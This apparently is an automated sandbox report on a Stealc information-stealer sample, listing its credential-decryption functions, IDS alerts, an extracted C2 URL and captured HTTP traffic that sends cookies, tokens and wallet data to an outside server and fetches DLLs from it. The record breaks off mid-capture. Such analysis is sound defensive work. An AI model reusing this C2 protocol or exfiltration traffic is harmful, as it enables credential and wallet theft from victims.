Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0076C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00767240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00767240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00769AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00769AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00778EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00778EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6CBA6C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.8:49705
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.8:49705
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49705 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 34 37 43 44 36 43 32 32 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 2d 2d 0d 0a Data Ascii: ------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="hwid"B547CD6C22534228319403------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="build"save------GIDBKKKKKFBGDGDHIDBG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBFHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 2d 2d 0d 0a Data Ascii: ------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="message"browsers------EBKKKEGIDBGHIDGDHDBF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAFIIJKJEGIDGDGIIDHHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 2d 2d 0d 0a Data Ascii: ------FBAFIIJKJEGIDGDGIIDHContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------FBAFIIJKJEGIDGDGIIDHContent-Disposition: form-data; name="message"plugins------FBAFIIJKJEGIDGDGIIDH--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAEHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="message"fplugins------HIIIJDAAAAAAKECBFBAE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBGDGCGDAKFIDGIDBFHost: 185.215.113.37Content-Length: 5751Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHCHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 67 33 4d 7a 67 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 67 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 33 4f 54 4d 34 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 33 4a 6a 55 30 6c 75 62 31 70 43 59 6a 5a 54 63 6e 63 77 55 47 52 51 54 55 35 6c 54 45 64 4c 63 32 56 6e 5a 6b 78 70 4c 58 52 52 62 6e 5a 70 61 47 38 31 61 45 74 4b 57 45 74 45 54 6d 63 77 61 31 68 4a 55 47 35 6d 56 47 4e 31 64 31 59 31 63 6a 64 53 63 57 70 55 4f 44 6b 7a 63 46 64 48 53 6b 59 33 61 32 78 4c 63 57 78 6b 51 6d 39 71 4e 48 4a 45 53 6e 5a 34 5a 6b 5a 73 5a 30 52 50 51 32 4e 58 4f 57 46 4c 52 47 35 56 4f 58 70 4a 62 46 56 6f 4d 6b 78 51 4d 48 5a 50 4f 47 73 7a 64 56 51 77 5a 30 68 4b 52 44 46 4b 64 6c 5a 42 59 32 78 72 53 6d 35 4c 64 31 70 48 4e 6d 68 45 51 57 77 32 4d 6b 68 79 54 58 68 4f 63 6c 56 6c 63 56 4e 53 4c 56 64 47 4d 55 6f 74 62 44 6c 5a 57 57 64 46 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzg3MzgJMVBfSkFSCTIwMjMtMTAtMDUtMDgKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk3OTM4CU5JRAk1MTE9b3JjU0lub1pCYjZTcncwUGRQTU5lTEdLc2VnZ
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBFIJEHDHCBGDGDGCBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 2d 2d 0d 0a Data Ascii: ------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="file"------AFCBFIJEHDHCBGDGDGCB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAEHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="file"------HIIIJDAAAAAAKECBFBAE--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIJJJEGDBFHDHJJDBAKHost: 185.215.113.37Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHCHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="message"wallets------AKEGDHJDHDAFHJJKJEHC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJECGHJDBFIJJJKEHCBHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a Data Ascii: ------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="message"ybncbhylepme------KJJECGHJDBFIJJJKEHCB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBGDGCGDAKFIDGIDBFHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 2d 2d 0d 0a Data Ascii: ------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="file"------IJDBGDGCGDAKFIDGIDBF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGCHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 2d 2d 0d 0a Data Ascii: ------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="message"files------AKKKFBGDHJKFHJJJJDGC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKFIIJJKJJJJJJEGDAHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 